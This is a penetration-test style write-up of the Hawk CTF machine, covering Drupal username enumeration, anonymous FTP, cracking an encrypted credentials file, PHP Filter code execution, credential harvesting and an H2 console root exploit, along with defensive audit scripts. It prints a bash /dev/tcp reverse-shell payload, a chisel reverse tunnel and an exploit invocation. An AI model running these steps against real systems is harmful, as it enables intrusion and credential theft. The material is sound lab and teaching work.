Hawk CTF Writeup


Hawk CTF

Hawk CTF is a medium to hard difficulty machine, which provides excellent practice in pentesting Drupal. The exploitable H2 DBMS installation is also realistic as web-based SQL consoles (RavenDB etc.) are found in many environments. The OpenSSL decryption challenge increases the difficulty of this machine.

Executive Summary

Introduction

This document shows the results of a security assessment performed on the Hawk machine (IP: 10.10.10.102). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.

Objective

The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.

Requirements

The assessment was conducted with the following requirements in mind:

  • Identify vulnerabilities within the Drupal CMS installation.
  • Exploit vulnerabilities to demonstrate potential impact.
  • Assess the effectiveness of access controls and authentication mechanisms.
  • Demonstrate privilege escalation from user-level to root.
  • Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.

High-Level Summary

The assessment uncovered several vulnerabilities within the Hawk machine:

  1. User Enumeration via Password Reset Error Message (Moderate Severity)
  2. Credentials Exposed via .drupal.txt.enc Decryption (High Severity)
  3. Initial Access via PHP Filter Module on Drupal CMS (High Severity)
  4. Cleartext credential disclosure leading to local privilege escalation (LPE) to the "daniel" user (High Severity)
  5. Outdated software (H2 Database Console) leading to LPE to root (Extreme Severity)

Detailed Findings

Detailed vulnerability explanations, vulnerability fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in the "Independent Challenge" section.

Recommendations

Based on the assessment findings, the following recommendations are advised to enhance the security posture of the Hawk machine:

  1. CMS Security: Remove unnecessary modules, such as the PHP Filter Module, to reduce attack surface. Implement 2FA.
  2. Insecure Practices Related to Credentials: Enforce strong password policies and avoid password reuse, and review and improve the encryption and storage of sensitive files containing credentials.
  3. FTP Security: Implement proper access controls for the FTP service.
  4. Update H2 Database Console: Regularly update H2 Database to the latest version to mitigate known vulnerabilities.


Methodology

Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:

  1. Reconnaissance: The initial phase involved gathering information about open ports.

  2. Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.

  3. Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.

  4. Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.

  5. Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.

Color Legend

Console color legend:

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Risk Classification

Risk Classification from http://www.pentest-standard.org

Independent Challenge - 10.10.10.102

Service Enumeration

IP Address      Ports Open
10.10.10.102    TCP: 21, 22, 80, 5435, 8082, 9092
Nmap scan output

Web Server Enumeration (TCP: 80)

Running Apache httpd 2.4.29.

CMS Enumeration

The droopescan tool identified plugins, themes, and possible version information, including the default admin login URL. The command used was: droopescan scan drupal -u http://10.10.10.102

droopescan output

Username enumeration

Vulnerability Explanation: The web application's error message during a password reset request (at /user/password) exposes valid usernames on the system. This provides attackers with a list of valid accounts, facilitating targeted attacks.

Vulnerability Fix: Modify the error message to avoid disclosing valid usernames. Implement proper error handling and validation.

Severity: Moderate

Steps to Reproduce the Finding:

  1. Run the command: wfuzz -d "name=FUZZ&form_build_id=form-0SR6gkn5bmPLfm6PeBEdlOna5oOMAsN2YUFI21ja-iM&form_id=user_pass&op=E-mail+new+password" -w /usr/share/seclists/Usernames/Names/names.txt -H "Content-Type: application/x-www-form-urlencoded" --hc 200 http://10.10.10.102/user/password
  2. Analyze the responses to identify valid usernames.
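The enumeration above leaves a distinctive trace in the web server's access log: one client posting to /user/password many times in a short window, with responses split between the re-rendered form and a redirect. The script below, an added example that is not part of the original report, shows how a defender would detect that burst. It assumes Apache combined log format and that the valid-name case answers with a 302 while the error case returns a 200 (consistent with the wfuzz --hc 200 filter in step 1); the log lines and IP addresses are constructed, not taken from the engagement.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format access log lines (hypothetical, not from the
# engagement). One client hammers the password-reset form; the mix of 200
# (form re-rendered with an error) and 302 (redirect after a valid name) is the
# signal a username-enumeration tool keys on, and the volume is our signal.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Jul/2023:10:00:01 +0000] "POST /user/password HTTP/1.1" 200 5120 "-" "Wfuzz/3.1.0"
10.10.14.5 - - [12/Jul/2023:10:00:01 +0000] "POST /user/password HTTP/1.1" 200 5120 "-" "Wfuzz/3.1.0"
10.10.14.5 - - [12/Jul/2023:10:00:02 +0000] "POST /user/password HTTP/1.1" 302 0 "-" "Wfuzz/3.1.0"
10.10.14.5 - - [12/Jul/2023:10:00:02 +0000] "POST /user/password HTTP/1.1" 200 5120 "-" "Wfuzz/3.1.0"
10.10.14.5 - - [12/Jul/2023:10:00:03 +0000] "POST /user/password HTTP/1.1" 200 5120 "-" "Wfuzz/3.1.0"
10.10.14.5 - - [12/Jul/2023:10:00:03 +0000] "POST /user/password HTTP/1.1" 200 5120 "-" "Wfuzz/3.1.0"
192.168.1.20 - - [12/Jul/2023:10:05:00 +0000] "POST /user/password HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.20 - - [12/Jul/2023:10:06:00 +0000] "GET /node/1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop any query string
        "status": int(m.group("status")),
    }


def find_reset_bursts(log_text, path="/user/password", threshold=5,
                      window=timedelta(seconds=60)):
    """Flag clients that POST to the reset form >= threshold times within `window`.

    Returns {ip: {"max_in_window": n, "statuses": [...]}} for each flagged client.
    The status list lets an analyst see the 200/302 split that enumeration relies on.
    """
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            per_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = 0, 0
        # Sliding window: advance `start` until the window fits, track the max count.
        for end, rec in enumerate(recs):
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = {
                "max_in_window": best,
                "statuses": sorted({r["status"] for r in recs}),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in find_reset_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {info['max_in_window']} reset POSTs in 60s, statuses {info['statuses']}")
```

Tune threshold and window to the site's normal reset traffic; a handful of resets per hour from one address is ordinary, dozens per minute is not. The detection complements, rather than replaces, the fix of returning the same response for valid and invalid names.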

FTP Enumeration (TCP: 21)

Anonymous Login and Data Leakage

Vulnerability Explanation: Anonymous login is enabled on the FTP server, allowing unauthorized access. An encrypted file .drupal.txt.enc containing potentially sensitive data was discovered. After downloading the file, Behind Security was able to crack it using a tool named "bruteforce-salted-openssl" and reveal the credentials for the admin user of Drupal CMS.

Vulnerability Fix: Disable anonymous FTP login. Review and improve the encryption and storage of sensitive files.

Severity: High

Steps to Reproduce the Attack:

  1. Log into the FTP server by leveraging the anonymous login capability. To do so, type the command ftp anonymous@10.10.10.102 and press enter when prompted for a password.
  2. Download the encrypted file at messages/.drupal.txt.enc.
  3. Decode from base64 and save to another file by running the command: cat .drupal.txt.enc | base64 -d > drupal.txt
  4. Locally, crack the decryption password using the command: bruteforce-salted-openssl -f /usr/share/wordlists/rockyou.txt -d SHA256 -t 5 drupal.txt
  5. After retrieving the decryption password (REDACTED), use it to decrypt the file. The command is: openssl enc -aes-256-cbc -d -in drupal.txt -out decrypted.txt -k friends
  6. Now you can log in as admin using the password (REDACTED) to Drupal CMS on port 80.

Connecting to the FTP server, downloading the .drupal.txt.enc file, decoding its contents and cracking the decryption password.
Decrypting the message that reveals valid credentials for the admin user on Drupal CMS (port 80)
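The root cause of this finding is a single configuration directive. The script below is an added example, not part of the original report, that audits a vsftpd configuration for the anonymous-access settings involved; it assumes the server is vsftpd (the report does not name the FTP daemon) and uses constructed configuration samples rather than the Hawk host's file. One detail worth knowing: vsftpd's compiled-in default for anonymous_enable is YES, so a configuration that merely omits the line is still vulnerable, which is why the audit fills in defaults instead of treating a missing key as safe.

```python
# Constructed vsftpd.conf samples (hypothetical, not the Hawk host's configuration).
WEAK_CONF = """\
# vsftpd configuration (constructed sample)
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=NO
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
"""

# Compiled-in vsftpd defaults for the directives checked here, per vsftpd.conf(5).
# anonymous_enable defaults to YES: omitting the line does not disable anonymous logins.
DEFAULTS = {
    "anonymous_enable": "YES",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
}


def parse_vsftpd_conf(text):
    """Parse vsftpd's option=value format, ignoring blank lines and # comments."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().upper()
    return settings


def audit_vsftpd(text):
    """Return finding codes for anonymous-access weaknesses in a vsftpd config.

    ANON_LOGIN: anonymous users can log in and read whatever the anon root exposes.
    ANON_WRITE: anonymous users can additionally upload files or create directories.
    """
    settings = parse_vsftpd_conf(text)
    get = lambda key: settings.get(key, DEFAULTS[key])
    findings = []
    if get("anonymous_enable") == "YES":
        findings.append("ANON_LOGIN")
        # Anonymous writes need write_enable plus one of the anon_* write options.
        if get("write_enable") == "YES" and (
            get("anon_upload_enable") == "YES" or get("anon_mkdir_write_enable") == "YES"
        ):
            findings.append("ANON_WRITE")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF), ("empty", "")):
        print(f"{label}: {audit_vsftpd(conf) or ['OK']}")
```

Run it against /etc/vsftpd.conf (or /etc/vsftpd/vsftpd.conf on Red Hat derivatives) as part of a host baseline check. Disabling anonymous login is the first fix; the second is not to stage secrets such as .drupal.txt.enc in a service directory at all, however they are encrypted, since a file protected only by a dictionary-derived password is one wordlist away from cleartext.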

Initial Access - Tricking the CMS to Execute Malicious PHP Code

Vulnerability Explanation: Behind Security gained access to the Drupal CMS as an admin and exploited the PHP Filter Module to execute malicious PHP code.

Vulnerability Fix: Disable the PHP Filter Module altogether and conduct a thorough review of user permissions to prevent unauthorized code execution.

Severity: High

Steps to Reproduce the Attack:

  1. Log in as admin with the previously discovered password.
  2. Go to Modules -> (Check) PHP Filter -> Save configuration.
  3. Then, Add content -> Select Basic Page or Article and insert malicious PHP code in the body. In this case, <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/PORT 0>&1 '"); ?>
  4. Select PHP code in Text format and then select Preview.
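The fix for this finding is to make sure the PHP Filter module is not enabled, and that is something an administrator can verify directly in the database rather than by clicking through the Modules page. The following is an added example, not code from the original report or from the Drupal project: it runs the check against Drupal 7's `system` table, using an in-memory SQLite stand-in with constructed rows so it runs offline. The SQL itself is plain enough to paste into the real site database (for instance via `drush sql-cli`). The `devel` entry in the risk list is an assumption about a common development-only module, not a finding from the page.

```python
import sqlite3

# Module names (Drupal 7 `system.name` values) that should not be enabled on a
# production site. 'php' is the PHP Filter module abused in the finding above;
# 'devel' is an assumed example of a development-only helper.
RISKY_MODULES = {
    "php": "PHP Filter: lets users of the PHP code text format run arbitrary PHP",
    "devel": "Devel: development helper that exposes debugging endpoints",
}

RISKY_MODULES_SQL = (
    "SELECT name FROM system WHERE type = 'module' AND status = 1 "
    "AND name IN ({placeholders})"
)


def risky_enabled_modules(conn):
    """Return {name: why} for enabled risky modules in Drupal 7's `system` table.

    `conn` is any DB-API connection using qmark parameters (sqlite3 here).
    """
    names = tuple(RISKY_MODULES)
    sql = RISKY_MODULES_SQL.format(placeholders=",".join("?" * len(names)))
    return {name: RISKY_MODULES[name] for (name,) in conn.execute(sql, names)}


def build_sample_db():
    """Constructed in-memory stand-in for a Drupal 7 `system` table (not Hawk's DB)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE system (filename TEXT, name TEXT, type TEXT, "
        "status INTEGER, schema_version INTEGER)"
    )
    conn.executemany(
        "INSERT INTO system VALUES (?, ?, ?, ?, ?)",
        [
            ("modules/php/php.module", "php", "module", 1, 0),
            ("modules/node/node.module", "node", "module", 1, 7015),
            ("modules/user/user.module", "user", "module", 1, 7019),
            ("sites/all/modules/devel/devel.module", "devel", "module", 0, 7008),
            ("themes/bartik/bartik.info", "bartik", "theme", 1, 0),
        ],
    )
    return conn


if __name__ == "__main__":
    for name, why in risky_enabled_modules(build_sample_db()).items():
        # On a real Drupal 7 site: `drush pm-disable <name>`, then `drush pm-uninstall <name>`.
        print(f"enabled: {name} - {why}")
```

Schedule the query alongside other configuration checks; a module that a compromised admin account re-enables between manual reviews is exactly what step 2 above exploits. Disabling the module is not enough on its own, since an admin account is involved in this finding: the account's password must also be changed and 2FA enforced, as the Recommendations section states.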

Post-Exploitation

Privilege Escalation to "daniel"

Vulnerability Explanation: Behind Security conducted further enumeration and discovered credentials for a user named "daniel" by analyzing configuration files related to Drupal CMS.

Vulnerability Fix: Enforce unique and strong credentials for each user account. Avoid reusing passwords across different services.

Severity: High

Steps to Reproduce the Attack:

  1. Behind Security executed the following command: find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
  2. The credentials for the user "daniel" were identified.
  3. Behind Security was able to log in via SSH as daniel@10.10.10.102, specifying the password: REDACTED

Exposed password
Changing user to "daniel" and escaping the python interpreter
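The database password in settings.php has to be readable by the web server, so a compromised web process will always be able to read it; what turned that read into an SSH login was password reuse combined with SSH accepting passwords at all. The script below is an added example, not part of the original report, that audits an sshd_config for password-based logins. It assumes OpenSSH (the report gives no SSH server details) and uses constructed configuration samples. Two sshd semantics that trip up naive checks are handled: the first occurrence of a keyword wins, and keyboard-interactive (PAM) authentication can still accept passwords when PasswordAuthentication is off.

```python
import re

# Constructed sshd_config samples (hypothetical, not the Hawk host's configuration).
PERMISSIVE = """\
# sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
Match User deploy
    PasswordAuthentication no
"""

HARDENED = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
"""

# OpenSSH compiled-in defaults for the directives checked (sshd_config(5)).
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "kbdinteractiveauthentication": "yes",
}


def parse_sshd_config(text):
    """Return {keyword: value} using sshd's rule that the first occurrence wins.

    Directives inside a Match block are skipped because they apply only to the
    matched users/hosts; the global setting is what the audit reports on.
    """
    settings = {}
    in_match = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            in_match = True
            continue
        if in_match:
            continue
        settings.setdefault(key, value)
    return settings


def audit_sshd(text):
    """Return finding codes for password-based SSH login paths.

    PASSWORD_AUTH: PasswordAuthentication is on (a reused password logs in directly).
    ROOT_PASSWORD_LOGIN: root may log in with a password.
    KBD_INTERACTIVE_AUTH: keyboard-interactive (PAM) auth is on, which still prompts
        for the account password even when PasswordAuthentication is off.
    """
    s = parse_sshd_config(text)
    # ChallengeResponseAuthentication is the older spelling of KbdInteractiveAuthentication.
    if "kbdinteractiveauthentication" not in s and "challengeresponseauthentication" in s:
        s["kbdinteractiveauthentication"] = s["challengeresponseauthentication"]
    get = lambda key: s.get(key, DEFAULTS[key]).lower()
    findings = []
    if get("passwordauthentication") == "yes":
        findings.append("PASSWORD_AUTH")
    if get("permitrootlogin") == "yes":
        findings.append("ROOT_PASSWORD_LOGIN")
    if get("kbdinteractiveauthentication") == "yes":
        findings.append("KBD_INTERACTIVE_AUTH")
    return findings


if __name__ == "__main__":
    for label, conf in (("permissive", PERMISSIVE), ("hardened", HARDENED)):
        print(f"{label}: {audit_sshd(conf) or ['OK']}")
```

Note that the Match block in the permissive sample only hardens one user; the global policy still allows passwords for everyone else, including "daniel", so the audit correctly reports it. Moving to key-only authentication means a password lifted from settings.php is useless for SSH even if it is reused; the separate fix, unique per-service credentials, remains necessary for the database account itself.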

Privilege Escalation to root

Vulnerability Explanation: Behind Security established a TCP tunnel using the tool "chisel" and exploited a vulnerability in the H2 Database version 1.4.196 to gain root access.

Vulnerability Fix: Regularly update and patch software components, including databases, to fix known vulnerabilities.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Behind Security established a TCP tunnel between their machine and the victim machine using the tool chisel: ./chisel server -p 1337 --reverse --socks5 & (attacker) and ./chisel client ATTACKER-IP:1337 R:socks & (victim).
  2. Behind Security accessed the H2 Database Console (localhost:8082) through the tunnel.
  3. Behind Security exploited the H2 Database vulnerability using a public exploit. The command used during the engagement was: proxychains4 python 45506.py -H localhost:8082

Uploading chisel to the victim machine and setting up a tunnel
FoxyProxy Firefox extension configuration in order to use chisel as a proxy
H2 Database panel accessed through chisel TCP tunnel on localhost:8082
Executing the exploit and obtaining root access

Conclusion

Behind Security successfully executed malicious PHP code within the CMS, escalated privileges to user “daniel”, and further exploited vulnerabilities in the H2 Database to gain root access. These findings underscore the importance of regularly updating and securing software components, implementing proper access controls, and maintaining strong authentication practices to mitigate the risk of unauthorized access and privilege escalation. Remediation measures should be promptly applied to address the identified vulnerabilities and enhance the security posture of the system.
